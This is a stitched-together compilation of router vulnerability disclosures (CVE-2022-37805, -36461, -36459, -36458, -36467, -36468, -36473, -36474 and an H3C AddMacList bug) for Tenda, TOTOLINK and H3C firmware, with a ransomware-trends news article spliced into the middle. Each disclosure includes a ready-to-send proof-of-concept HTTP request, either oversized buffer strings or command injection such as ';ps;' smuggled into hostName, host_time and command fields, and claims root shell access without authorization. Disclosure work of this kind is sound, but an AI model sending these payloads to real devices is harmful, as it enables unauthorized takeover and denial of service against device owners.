Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the function fromWizardHandle.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the fromWizardHandle function. An attacker can obtain a stable root shell through a carefully constructed payload.

When wanflag > = wanport and want=2, we can reach the vulnerable branch.

Stack overflow vulnerability occurs in the decodepwd function.

The decodepwd function is equivalent to copying data from and filtering "/" symbols.As long as the pppoepwd(the value of PPW) we enter exceeds the size of the decode_pwd array, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/WizardHandle HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 12
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    WANS=0&WANT=2&PPW=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

Finally, you also can write exp to get a stable root shell.

CVE-2022-37805: vuln/Tenda/AC1206/1 at main · Darry-lang1/vuln

As cryptocurrency valuations make strikes less lucrative, ransomware gangs like the new RedAlert and Monster groups are modifying their tools to attack across platforms.

Two emerging ransomware gangs, known as RedAlert and Monster, have adopted cross-platform capabilities to make attacks easier to execute against multiple operating systems and environments. It's a shining example of a snowballing trend toward multiplatform ransomware attacks, for which defenders need to gear up.

One of the new threat groups, referred to as RedAlert or N13V, creates executables in a Linux-specific version of C, and also supports VMware's enterprise-class ESXi hypervisor. The other threat group, Monster, uses an older cross-platform language, Delphi, which makes it easy to tailor the attack for a specific victim's configuration.

The ability to impact a variety of client operating systems within a single victim's environment started gaining steam in 2021, according to an advisory from Kaspersky published on Thursday. The Conti group, for example, allows affiliates to access a Linux variant of its ransomware, which also allows targeting of systems running VMware's ESXi hypervisor.

**Deploy Once, Affect Many**

There are several reasons for the trend: For one, it cuts down on labor. Attackers need only to write a certain program functionality once, and are then be able to use the resulting code to script the attacks against multiple targets, Kaspersky's advisory stated.

"We've gotten quite used to the ransomware groups deploying malware written in cross-platform language," Jornt van der Wiel, senior security researcher at Kaspersky's Global Research and Analysis Team, said in a statement. "These days, cybercriminals \[have\] learned to adjust their malicious code written in plain programming languages for joint attacks, making security specialists elaborate on ways to detect and prevent the ransomware attempts."

Other benefits to cross-platform attacks is the ability to hamper analysis, plus the ability to customize attacks to specific victim environments. Groups can use command lines to customize an attack to prevent code from running on ESXi environments, for instance — or conversely, to focus on certain kinds of client virtual machines.

"Recently, their goal is to damage as many systems as possible by adapting their malware code to several OS at the time," Kaspersky stated in its blog post on 2022 ransomware trends. "\[But\] there are a few other reasons to use a cross-platform language." 

Kaspersky also noted that ransomware gangs are getting better and better at adapting n-day exploits, which it dubbed "1-day" exploits, to multiplatform attacks. N-days refer to just-reported vulnerabilities that cybercriminals race to exploit before companies have time to patch them.

"\[Such broad functionality\] is something we usually see in commercial exploits," the company said, noting that one of the two exploits covered in its latest advisory was used "in the wild" during an attack on a large retailer in the Asia-Pacific region.

The move to cross-platform is borne out of necessity, researchers said. In the first half of 2022, as the value of cryptocurrencies plummeted, ransomware attacks declined, with cybersecurity firm Arctic Wolf reporting a drop of about a quarter. While the trend did not hold for other cybercrimes, such as investment scams and business email compromises, the headwinds for ransomware groups meant that threat actors have had to find ways to increase their success.

**Rust and GoLang Gain Steam for Ransomware Coding**

A common way that groups have tackled the process of adding cross-platform capabilities is to write the code in a language that supports other platforms, such as Rust or Golang, Kaspersky noted in its Aug. 24 advisory.   

The BlackCat ransomware program, for instance, is written in Rust, a successor to C, which has gained traction because of its improved security features. 

"Due to Rust cross-compilation capabilities, it did not take \[a\] long time for us to find BlackCat samples that work on Linux as well," Kaspersky said in the advisory. "The Linux sample of BlackCat is very similar to the Windows one."

Ransomware written in Rust and Go also make analysis harder for malware researchers, since tools to analyze those languages are not as sophisticated as analyzing programs written in the common C programming language, Kaspersky noted.

More Bang for the Buck: Cross-Platform Ransomware Is the Next Problem

TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a command injection vulnerability via the hostName parameter in the function setOpModeCfg.

Permalink

**TOTOLink A3700R V9.1.2u.6134\_B20201202 Has an command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=69&ids=36

**Product Information**

TOTOLink A3700R V9.1.2u.6134\_B20201202 router, the latest version of simulation overview：

**Vulnerability details**

TOTOLINK A3700R (V9.1.2u.6134\_B20201202) was found to contain a command insertion vulnerability in setOpModeCfg.This vulnerability allows an attacker to execute arbitrary commands through the "hostName" parameter.

By calling these functions, we can ultimately call sub\_4241E0 function (as shown in the last picture). By setting the proto value to 1, we can reach the default branch.V48 passes directly into the dosystem function.

The dosystem function is finally found to be implemented in this file by string matching.

Reverse analysis found that the function was called directly through the system function, which has a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Length: 52
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Cookie: SESSION_ID=2:1658224702:2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Pragma: no-cache
    Cache-Control: no-cache
    
    {"hostName":"admin';ps #","proto":"1","opmode":"br","topicurl":"setOpModeCfg"}
    

The above figure shows the POC attack effect

Finally, you can write exp to get a stable root shell without authorization.

CVE-2022-36461: vuln/readme.md at main · Darry-lang1/vuln

TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a command injection vulnerability via the host_time parameter in the function NTPSyncWithHost.

Permalink

**TOTOLink A3700R V9.1.2u.6134\_B20201202 Has an command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=69&ids=36

**Product Information**

TOTOLink A3700R V9.1.2u.6134\_B20201202 router, the latest version of simulation overview：

**Vulnerability details**

TOTOLINK A3700R (V9.1.2u.6134\_B20201202) was found to contain a command insertion vulnerability in NTPSyncWithHost.This vulnerability allows an attacker to execute arbitrary commands through the "host\_time" parameter.

Var passes directly into the dosystem function.

The dosystem function is finally found to be implemented in this file by string matching.

Reverse analysis found that the function was called directly through the system function, which has a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Length: 52
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Cookie: SESSION_ID=2:1658224702:2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Pragma: no-cache
    Cache-Control: no-cache
    
    {"host_time":"2022-07-19 22:24:46';ps;'","topicurl":"NTPSyncWithHost"}
    

The above figure shows the POC attack effect

Finally, you can write exp to get a stable root shell without authorization.

CVE-2022-36459: vuln/readme.md at main · Darry-lang1/vuln

TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a command injection vulnerability via the command parameter in the function setTracerouteCfg.

Permalink

**TOTOLink A3700R V9.1.2u.6134\_B20201202 Has an command injection vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=69&ids=36

**Product Information**

TOTOLink A3700R V9.1.2u.6134\_B20201202 router, the latest version of simulation overview：

**Vulnerability details**

TOTOLINK A3700R (V9.1.2u.6134\_B20201202) was found to contain a command insertion vulnerability in setTracerouteCfg.This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

Format var into V6 using sprintf function and pass in dosystem function.

The dosystem function is finally found to be implemented in this file by string matching.

Reverse analysis found that the function was called directly through the system function, which has a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Length: 52
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Cookie: SESSION_ID=2:1658224702:2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Pragma: no-cache
    Cache-Control: no-cache
    
    {"command":";ps;","num":"1","topicurl":"setTracerouteCfg"}
    

The above figure shows the POC attack effect

Finally, you can write exp to get a stable root shell without authorization.

CVE-2022-36458: vuln/readme.md at main · Darry-lang1/vuln

H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function EditMacList.d.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the EditMacList function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the EditMacList function, V12(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V19, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=EditMacList&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36467: vuln/readme.md at main · Darry-lang1/vuln

H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function Asp_SetTimingtimeWifiAndLed.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the Asp\_SetTimingtimeWifiAndLed function. An attacker can obtain a stable root shell through a carefully constructed payload.

!\[image-20220720231031268\](D:\\vuln\\H3C\\H3C B5Mini\\5\\img\\image-20220720231031268.png)

In the Asp_SetTimingtimeWifiAndLed function, the V11(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V12, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=Asp_SetTimingtimeWifiAndLed&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36468: vuln/readme.md at main · Darry-lang1/vuln

H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function Edit_BasicSSID_5G.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the Edit\_BasicSSID\_5G function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the Edit_BasicSSID_5G function, V30(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V31, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=Edit_BasicSSID_5G&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36473: vuln/readme.md at main · Darry-lang1/vuln

H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function WlanWpsSet.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the WlanWpsSet function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the WlanWpsSet function, V5(the valueparam) we entered is formatted using the sscanf function and in the form of %d;%[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V7, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=WlanWpsSet&param=1;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36474: vuln/readme.md at main · Darry-lang1/vuln

H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function AddMacList.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the AddMacList function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the AddMacList function, V12(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V19, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=AddMacList&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

Tag

#windows